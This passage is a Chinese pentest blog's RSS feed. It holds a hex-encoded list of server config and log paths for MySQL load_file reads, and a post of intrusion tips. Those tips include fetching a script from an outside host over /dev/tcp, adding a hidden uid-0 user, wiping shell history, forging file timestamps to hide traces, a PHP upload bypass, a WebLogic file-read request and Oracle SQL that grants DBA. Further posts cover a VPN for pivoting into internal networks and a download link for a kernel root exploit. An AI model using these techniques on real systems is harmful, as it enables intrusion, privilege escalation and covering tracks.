/var/log/apache2/error_log 0x2F7661722F6C6F672F617061636865322F6572726F725F6C6F67<br />
/var/log/apache2/error.log 0x2F7661722F6C6F672F617061636865322F6572726F722E6C6F67<br />
/var/log/apache2/access_log 0x2F7661722F6C6F672F617061636865322F6163636573735F6C6F67<br />
/var/log/apache2/access.log 0x2F7661722F6C6F672F617061636865322F6163636573732E6C6F67<br />
/var/www/logs/error_log 0x2F7661722F7777772F6C6F67732F6572726F725F6C6F67<br />
/var/www/logs/error.log 0x2F7661722F7777772F6C6F67732F6572726F722E6C6F67<br />
/var/www/logs/access_log 0x2F7661722F7777772F6C6F67732F6163636573735F6C6F67<br />
/var/www/logs/access.log 0x2F7661722F7777772F6C6F67732F6163636573732E6C6F67<br />
/usr/local/apache/logs/error_log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6572726F725F6C6F67<br />
/usr/local/apache/logs/error.log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6572726F722E6C6F67<br />
/usr/local/apache/logs/access_log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6163636573735F6C6F67<br />
/usr/local/apache/logs/access.log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6163636573732E6C6F67 </p>
<p>/var/log/error_log 0x2F7661722F6C6F672F6572726F725F6C6F67<br />
/var/log/error.log 0x2F7661722F6C6F672F6572726F722E6C6F67<br />
/var/log/access_log 0x2F7661722F6C6F672F6163636573735F6C6F67<br />
/var/log/access.log 0x2F7661722F6C6F672F6163636573732E6C6F67 </p>
<p>/usr/local/apache/logs/access_logaccess_log.old 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6163636573735F6C6F676163636573735F6C6F672E6F6C64<br />
/usr/local/apache/logs/error_logerror_log.old 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6572726F725F6C6F676572726F725F6C6F672E6F6C64</p>
<p>/etc/php.ini 0x2F6574632F7068702E696E69<br />
/bin/php.ini 0x2F62696E2F7068702E696E69<br />
/etc/init.d/httpd 0x2F6574632F696E69742E642F6874747064<br />
/etc/init.d/mysql 0x2F6574632F696E69742E642F6D7973716C </p>
<p>/etc/httpd/php.ini 0x2F6574632F68747470642F7068702E696E69<br />
/usr/lib/php.ini 0x2F7573722F6C69622F7068702E696E69<br />
/usr/lib/php/php.ini 0x2F7573722F6C69622F7068702F7068702E696E69<br />
/usr/local/etc/php.ini 0x2F7573722F6C6F63616C2F6574632F7068702E696E69<br />
/usr/local/lib/php.ini 0x2F7573722F6C6F63616C2F6C69622F7068702E696E69<br />
/usr/local/php/lib/php.ini 0x2F7573722F6C6F63616C2F7068702F6C69622F7068702E696E69<br />
/usr/local/php4/lib/php.ini 0x2F7573722F6C6F63616C2F706870342F6C69622F7068702E696E69<br />
/usr/local/php4/php.ini 0x2F7573722F6C6F63616C2F706870342F7068702E696E69<br />
/usr/local/php4/lib/php.ini 0x2F7573722F6C6F63616C2F706870342F6C69622F7068702E696E69<br />
/usr/local/php5/lib/php.ini 0x2F7573722F6C6F63616C2F706870352F6C69622F7068702E696E69<br />
/usr/local/php5/etc/php.ini 0x2F7573722F6C6F63616C2F706870352F6574632F7068702E696E69<br />
/usr/local/php5/php5.ini 0x2F7573722F6C6F63616C2F706870352F706870352E696E69<br />
/usr/local/apache/conf/php.ini 0x2F7573722F6C6F63616C2F6170616368652F636F6E662F7068702E696E69 </p>
<p>/usr/local/apache/conf/httpd.conf 0x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E66<br />
/usr/local/apache2/conf/httpd.conf 0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66 </p>
<p>/usr/local/apache2/conf/php.ini 0x2F7573722F6C6F63616C2F617061636865322F636F6E662F7068702E696E69<br />
/etc/php4.4/fcgi/php.ini 0x2F6574632F706870342E342F666367692F7068702E696E69<br />
/etc/php4/apache/php.ini 0x2F6574632F706870342F6170616368652F7068702E696E69<br />
/etc/php4/apache2/php.ini 0x2F6574632F706870342F617061636865322F7068702E696E69<br />
/etc/php5/apache/php.ini 0x2F6574632F706870352F6170616368652F7068702E696E69<br />
/etc/php5/apache2/php.ini 0x2F6574632F706870352F617061636865322F7068702E696E69<br />
/etc/php/php.ini 0x2F6574632F7068702F7068702E696E69<br />
/etc/php/php4/php.ini 0x2F6574632F7068702F706870342F7068702E696E69<br />
/etc/php/apache/php.ini 0x2F6574632F7068702F6170616368652F7068702E696E69<br />
/etc/php/apache2/php.ini 0x2F6574632F7068702F617061636865322F7068702E696E69<br />
/web/conf/php.ini 0x2F7765622F636F6E662F7068702E696E69<br />
/usr/local/Zend/etc/php.ini 0x2F7573722F6C6F63616C2F5A656E642F6574632F7068702E696E69<br />
/opt/xampp/etc/php.ini 0x2F6F70742F78616D70702F6574632F7068702E696E69<br />
/var/local/www/conf/php.ini 0x2F7661722F6C6F63616C2F7777772F636F6E662F7068702E696E69<br />
/var/local/www/conf/httpd.conf 0x2F7661722F6C6F63616C2F7777772F636F6E662F68747470642E636F6E66<br />
/etc/php/cgi/php.ini 0x2F6574632F7068702F6367692F7068702E696E69<br />
/etc/php4/cgi/php.ini 0x2F6574632F706870342F6367692F7068702E696E69<br />
/etc/php5/cgi/php.ini 0x2F6574632F706870352F6367692F7068702E696E69 </p>
<p>/php5/php.ini 0x2F706870352F7068702E696E69<br />
/php4/php.ini 0x2F706870342F7068702E696E69<br />
/php/php.ini 0x2F7068702F7068702E696E69<br />
/PHP/php.ini 0x2F5048502F7068702E696E69 </p>
<p>/apache/php/php.ini 0x2F6170616368652F7068702F7068702E696E69 </p>
<p>/xampp/apache/bin/php.ini 0x2F78616D70702F6170616368652F62696E2F7068702E696E69<br />
/xampp/apache/conf/httpd.conf 0x2F78616D70702F6170616368652F636F6E662F68747470642E636F6E66<br />
/NetServer/bin/stable/apache/php.ini 0x2F4E65745365727665722F62696E2F737461626C652F6170616368652F7068702E696E69<br />
/home2/bin/stable/apache/php.ini 0x2F686F6D65322F62696E2F737461626C652F6170616368652F7068702E696E69 </p>
<p>/home/bin/stable/apache/php.ini 0x2F686F6D652F62696E2F737461626C652F6170616368652F7068702E696E69 </p>
<p>/var/log/mysql/mysql-bin.log 0x2F7661722F6C6F672F6D7973716C2F6D7973716C2D62696E2E6C6F67<br />
/var/log/mysql.log 0x2F7661722F6C6F672F6D7973716C2E6C6F67<br />
/var/log/mysqlderror.log 0x2F7661722F6C6F672F6D7973716C646572726F722E6C6F67<br />
/var/log/mysql/mysql.log 0x2F7661722F6C6F672F6D7973716C2F6D7973716C2E6C6F67<br />
/var/log/mysql/mysql-slow.log 0x2F7661722F6C6F672F6D7973716C2F6D7973716C2D736C6F772E6C6F67<br />
/var/mysql.log 0x2F7661722F6D7973716C2E6C6F67 </p>
<p>/var/lib/mysql/my.cnf 0x2F7661722F6C69622F6D7973716C2F6D792E636E66<br />
/usr/local/mysql/my.cnf 0x2F7573722F6C6F63616C2F6D7973716C2F6D792E636E66<br />
/usr/local/mysql/bin/mysql 0x2F7573722F6C6F63616C2F6D7973716C2F62696E2F6D7973716C<br />
/etc/mysql/my.cnf 0x2F6574632F6D7973716C2F6D792E636E66<br />
/etc/my.cnf 0x2F6574632F6D792E636E66 </p>
<p>/usr/local/cpanel/logs 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F6773<br />
/usr/local/cpanel/logs/stats_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F73746174735F6C6F67<br />
/usr/local/cpanel/logs/access_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6163636573735F6C6F67<br />
/usr/local/cpanel/logs/error_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6572726F725F6C6F67<br />
/usr/local/cpanel/logs/license_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6C6963656E73655F6C6F67<br />
/usr/local/cpanel/logs/login_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6C6F67696E5F6C6F67<br />
/usr/local/cpanel/logs/stats_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F73746174735F6C6F67<br />
/usr/local/share/examples/php4/php.ini 0x2F7573722F6C6F63616C2F73686172652F6578616D706C65732F706870342F7068702E696E69<br />
/usr/local/share/examples/php/php.ini 0x2F7573722F6C6F63616C2F73686172652F6578616D706C65732F7068702F7068702E696E69</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2012年01月31日 -- <a href="http://www.4shell.org/archives/2078.html" title="命令行导出IIS配置信息">命令行导出IIS配置信息</a></li><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2051.html" title="域内指定用户中马">域内指定用户中马</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1958.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>linux渗透小技巧</title>
		<link>http://www.4shell.org/archives/1956.html</link>
		<comments>http://www.4shell.org/archives/1956.html#comments</comments>
		<pubDate>Mon, 06 Jun 2011 13:22:45 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[小技巧]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1956</guid>
		<description><![CDATA[1.无wget nc等下载工具时下载文件 exec 5/dev/tcp/yese.yi.org/80 &#038;&#038;echo -e “GET /c.pl HTTP/1.0\n” >&#038;5 &#038;&#038; cat c.pl 2.Linux添加uid为0的用户 useradd -o -u 0 cnbird 3.bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null 4.SSH反向链接 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口 然后服务器上执行ssh localhost -p 44即可 5.weblogic本地读取文件漏洞 curl -H “wl_request_type: wl_xml_entity_request” -H “xml-registryname: ../../” -H “xml-entity-path: config.xml” http://server/wl_management_internal2/wl_management 6.apache查看虚拟web目录 ./httpd -t -D [...]]]></description>
			<content:encoded><![CDATA[<p>1.无wget nc等下载工具时下载文件<br />
exec 5<>/dev/tcp/yese.yi.org/80 &#038;&echo -e “GET /c.pl HTTP/1.0\n” >&#038;5 &#038;& cat<&#038;5 > c.pl</p>
<p>2.Linux添加uid为0的用户<br />
useradd -o -u 0 cnbird</p>
<p>3.bash去掉history记录<br />
export HISTSIZE=0<br />
export HISTFILE=/dev/null<br />
<span id="more-1956"></span><br />
4.SSH反向链接<br />
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口<br />
然后服务器上执行ssh localhost  -p 44即可</p>
<p>5.weblogic本地读取文件漏洞<br />
curl -H “wl_request_type: wl_xml_entity_request” -H “xml-registryname: ../../” -H “xml-entity-path: config.xml” http://server/wl_management_internal2/wl_management</p>
<p>6.apache查看虚拟web目录<br />
./httpd -t -D DUMP_VHOSTS</p>
<p>7.cvs渗透技巧<br />
CVSROOT/passwd   UNIX SHA1的密码文件<br />
CVSROOT/readers<br />
CVSROOT/writers<br />
CVS/Root ¦lt;br /> CVS/Entries     更新的文件和目录内容<br />
CVS/Repository</p>
<p>8.Cpanel路径泄露<br />
/3rdparty/squirrelmail/functions/plugin.php</p>
<p>9.修改上传文件时间戳(掩盖入侵痕迹)<br />
touch -r 老文件时间戳 新文件时间戳</p>
<p>10.利用baidu和google搜索目标主机webshell<br />
intitle:PHPJackal 1t1t</p>
<p>11.包总补充<br />
创建临时“隐藏”目录 mkdir /tmp/…<br />
/tmp/…目录在管理员有宿醉的情况下是“隐藏”的，可以临时放点exp啥的</p>
<p>12.利用linux输出绕过gif限制的图片<br />
printf “GIF89a\x01\x00\x01\x00<?php phpinfo();?>” > poc.php</p>
<p>13.读取环境变量对于查找信息非常有帮助<br />
/proc/self/environ</p>
<p>14.最新的ORACLE 11提升用户权限(只要session权限)<br />
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS</p>
<p>判断登陆权限<br />
select * from session_privs;<br />
Create SESSION</p>
<p>select * from session_roles;</p>
<p>select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = ‘GREMLIN(用户名)’;</p>
<p>DESC JAVA$POLICY$</p>
<p>DECLARE<br />
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;<br />
CURSOR C1 IS Select ‘GRANT’ USER(), ‘SYS’, ‘java.io.FilePermission’, ‘<<ALL FILES>>’, ‘execute’, ‘ENABLE’ FROM DUAL;<br />
BEGIN<br />
OPEN C1;<br />
FETCH C1 BULK COLLECT INTO POL;<br />
CLOSE C1;<br />
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);<br />
END;<br />
/</p>
<p>connect / as sysdba<br />
COL TYPE_NAME FOR A30;<br />
COL NAME FOR A30;<br />
COL_ACTION FOR A10;<br />
Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = ‘用户’;</p>
<p>connect 普通用户<br />
set serveroutput on<br />
exec dbms_java.set_output(10000);</p>
<p>Select DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’, ‘oracle/aurora/rdbms/DbmsJava’, ‘SYS’, ‘writeOutputToFile’, ‘TEXT’, NULL, NULL, NULL, NULL,0,1,1,1,1,0, ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;’BEGIN EXECUTE IMMEDIATE ”GRANT DBA TO 用户”; END;’, ‘BEGIN NULL; END;’) FROM DUAL;</p>
<p>EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(‘NO_SUCH_SUBSCRIPTION’, SYSDATE());</p>
<p>set role dba;</p>
<p>select * from session_privs;</p>
<p>EXEC SYS.VULNPROC(‘FOO”||DBMS_JAVA.SET_OUTPUT_TO_SQL(“ID”,”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE”"GRANT DBA TO PUBLIC”";DBMS_OUTPUT.PUT_LINE(:1);END;”,”TEXT”)||”BAR’);</p>
<p>Select DBMS_JAVA.RUNJAVA(‘oracle/aurora/util/Test’) FROM DUAL;<br />
SET ROLE DBA;</p>
<p>15. webLogic渗透技巧<br />
四. Weblogin Script Tool(WLST)</p>
<p>写入到<Domain_home>\\config\\config.xml</p>
<p>1.进行修改:<br />
<bea_home>\wlserver_10.0\server\bin\setWLSenv.sh<br />
2.启动WLST<br />
java weblogic.WLST</p>
<p>wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)<br />
wls:/bbk/serverConfig> help()</p>
<p>wls:/bbk/serverConfig> edit()<br />
wls:/bbk/serverConfig> cd(‘Servers’)<br />
wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’)<br />
wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’)<br />
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()<br />
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ’4′)<br />
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()<br />
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change<br />
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()<br />
wls:/offline> exit()</p>
<p>3.批处理:<br />
保存以上命令为cnbird.py<br />
connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)<br />
cd(‘Servers’)<br />
cd(‘Log’)<br />
cd(‘Server-cnbird’)<br />
startEdit()<br />
set(‘FileCount’, ’4′)<br />
save()<br />
然后执行java weblogic.WLST cnbird.py</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2012年01月31日 -- <a href="http://www.4shell.org/archives/2078.html" title="命令行导出IIS配置信息">命令行导出IIS配置信息</a></li><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2051.html" title="域内指定用户中马">域内指定用户中马</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1956.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux 安装基于PPTPD的vpn,内网渗透用</title>
		<link>http://www.4shell.org/archives/1933.html</link>
		<comments>http://www.4shell.org/archives/1933.html#comments</comments>
		<pubDate>Thu, 26 May 2011 04:29:41 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[PPTPD]]></category>
		<category><![CDATA[VPN]]></category>
		<category><![CDATA[内网渗透]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1933</guid>
		<description><![CDATA[准备: cat /etc/issue //看版本 如果dns没设置,就编辑/etc/resolv.conf 改DNS 如果主机不能上网就试着防火墙里允许通过 下载程序: cd /tmp wget http://poptop.sourceforge.net/yum/stable/packages/dkms-2.0.17.5-1.noarch.rpm wget http://poptop.sourceforge.net/yum/stable/packages/kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm 根据第一步的返回情况,下载对应版本的rpm 如果是Centos 4版本的 wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.3-7.rhel4.i386.rpm wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel4.i386.rpm CentOS 5的 wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.4-3.1.rhel5.i386.rpm wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel5.1.i386.rpm 安装程序: 下载回来这4个文件后安装 [按顺序] rpm -ivh dkms-2.0.17.5-1.noarch.rpm rpm -ivh kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm Centos 4: rpm -Uvh ppp-2.4.3-7.rhel4.i386.rpm rpm -ivh pptpd-1.3.4-1.rhel4.i386.rpm CentOS 5: rpm -Uvh ppp-2.4.4-3.1.rhel5.i386.rpm rpm -ivh pptpd-1.3.4-1.rhel5.1.i386.rpm 配置pptpd: echo localip [...]]]></description>
			<content:encoded><![CDATA[<p><strong>准备:</strong></p>
<p>cat /etc/issue //看版本</p>
<p>如果dns没设置,就编辑/etc/resolv.conf 改DNS</p>
<p>如果主机不能上网就试着防火墙里允许通过</p>
<p><strong><strong>下载程序:</strong></strong></p>
<p>cd /tmp<br />
wget http://poptop.sourceforge.net/yum/stable/packages/dkms-2.0.17.5-1.noarch.rpm<br />
wget http://poptop.sourceforge.net/yum/stable/packages/kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm<br />
根据第一步的返回情况,下载对应版本的rpm</p>
<p>如果是Centos 4版本的<br />
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.3-7.rhel4.i386.rpm<br />
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel4.i386.rpm</p>
<p>CentOS 5的<br />
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.4-3.1.rhel5.i386.rpm<br />
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel5.1.i386.rpm</p>
<p><strong>安装程序:</strong></p>
<p>下载回来这4个文件后安装 [按顺序]</p>
<p>rpm -ivh dkms-2.0.17.5-1.noarch.rpm<br />
rpm -ivh kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm</p>
<p>Centos 4:<br />
rpm -Uvh ppp-2.4.3-7.rhel4.i386.rpm<br />
rpm -ivh pptpd-1.3.4-1.rhel4.i386.rpm</p>
<p>CentOS 5:<br />
rpm -Uvh ppp-2.4.4-3.1.rhel5.i386.rpm<br />
rpm -ivh pptpd-1.3.4-1.rhel5.1.i386.rpm</p>
<p><strong>配置pptpd:</strong></p>
<p>echo localip 10.12.12.1 &gt;&gt;/etc/pptpd.conf<br />
echo remoteip 10.12.12.100-254 &gt;&gt;/etc/pptpd.conf</p>
<p>加一个pptpd用户</p>
<p>echo open pptpd open 10.12.12.101 &gt;&gt;/etc/ppp/chap-secrets</p>
<p>临时启用nat (允许访问内网和外网)</p>
<p>echo 1 &gt;/proc/sys/net/ipv4/ip_forward<br />
长期调整的话..可以编辑/etc/sysctl.conf这个文件中的net.ipv4.ip_forward = ???</p>
<p><strong>防火墙设置:</strong></p>
<p>iptables -t nat -F<br />
iptables -t nat -A POSTROUTING -s 10.12.12.0/24 -j SNAT --to 10.12.12.1<br />
service iptables save<br />
防火墙允许通过. 也可以service iptables stop</p>
<p><strong>启动或停止服务:</strong></p>
<p>启动<br />
service pptpd start</p>
<p>停止<br />
service pptpd stop</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2007年11月16日 -- <a href="http://www.4shell.org/archives/238.html" title="高级内网渗透工具:Paris (创建VPN)">高级内网渗透工具:Paris (创建VPN)</a></li><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1933.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</title>
		<link>http://www.4shell.org/archives/1930.html</link>
		<comments>http://www.4shell.org/archives/1930.html#comments</comments>
		<pubDate>Mon, 16 May 2011 09:02:52 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[矩阵毒刺]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1930</guid>
		<description><![CDATA[Exploit Title: kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images # Date: 2010 # Author: SA H4x0r # Version: 2.6.18-20 , 2.6.32-24 Kernel 2010 i686 And x86_64 local Private Cant See Images # Tested on: Linux System # Link : Cant See Links # Greetz : All Friends And v4-Team 下载： kernel-2.6.18-164 Local 2010 [...]]]></description>
			<content:encoded><![CDATA[<p>Exploit Title: kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images<br />
# Date: 2010<br />
# Author: SA H4x0r<br />
# Version: 2.6.18-20 , 2.6.32-24 Kernel 2010 i686 And x86_64 local Private Cant See Images<br />
# Tested on: Linux System<br />
# Link : Cant See Links<br />
# Greetz : All Friends And v4-Team</p>
<p><span id="more-1930"></span></p>
<p>下载：<br />
<a href="http://www.4shell.org/wp-content/uploads/2011/05/kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images.rar"> kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年12月16日 -- <a href="http://www.4shell.org/archives/1857.html" title="Exploits Linux Kernel <= 2.6.37 local privilege escalation">Exploits Linux Kernel <= 2.6.37 local privilege escalation</a></li><li>2009年09月1日 -- <a href="http://www.4shell.org/archives/1079.html" title="Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit">Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit</a></li><li>2009年05月17日 -- <a href="http://www.4shell.org/archives/779.html" title="Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit">Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit</a></li><li>2008年11月2日 -- <a href="http://www.4shell.org/archives/520.html" title="Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit">Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit</a></li><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1930.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux基本操作命令</title>
		<link>http://www.4shell.org/archives/1920.html</link>
		<comments>http://www.4shell.org/archives/1920.html#comments</comments>
		<pubDate>Fri, 29 Apr 2011 20:27:23 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1920</guid>
		<description><![CDATA[#———————————————————————— # 服务器信息查看 #———————————————————————— 1.查看版本，内核 cat /etc/issue 2.查看cpu,mem grep “model name” /proc/cpuinfo grep MemTotal /proc/meminfo free 3. 内存的插槽数,已经使用多少插槽.每条内存多大，已使用内存多大 dmidecode &#124; grep -P -A 5 “Memorys+Device” &#124; grep Size &#124; grep -v Range Size: 2048 MB Size: No Module Installed Size: No Module Installed Size: No Module Installed 4. 支持的最大内存容量 dmidecode &#124; grep -P ‘Maximums+Capacity’ Maximum [...]]]></description>
			<content:encoded><![CDATA[<p>#————————————————————————<br />
# 服务器信息查看<br />
#————————————————————————</p>
<p>1.查看版本，内核<br />
cat /etc/issue</p>
<p>2.查看cpu,mem<br />
grep “model name” /proc/cpuinfo<br />
grep MemTotal /proc/meminfo<br />
free</p>
<p>3. 内存的插槽数,已经使用多少插槽.每条内存多大，已使用内存多大<br />
dmidecode | grep -P -A 5 “Memorys+Device” | grep Size | grep -v Range</p>
<p>Size: 2048 MB<br />
Size: No Module Installed<br />
Size: No Module Installed<br />
Size: No Module Installed</p>
<p>4. 支持的最大内存容量<br />
dmidecode | grep -P ‘Maximums+Capacity’<br />
Maximum Capacity: 64 GB</p>
<p><span id="more-1920"></span></p>
<p>5. 查看内存的频率<br />
dmidecode | grep -A16 “Memory Device”<br />
dmidecode | grep -A16 “Memory Device” | grep ‘Speed’</p>
<p>6.查看操作系统位数<br />
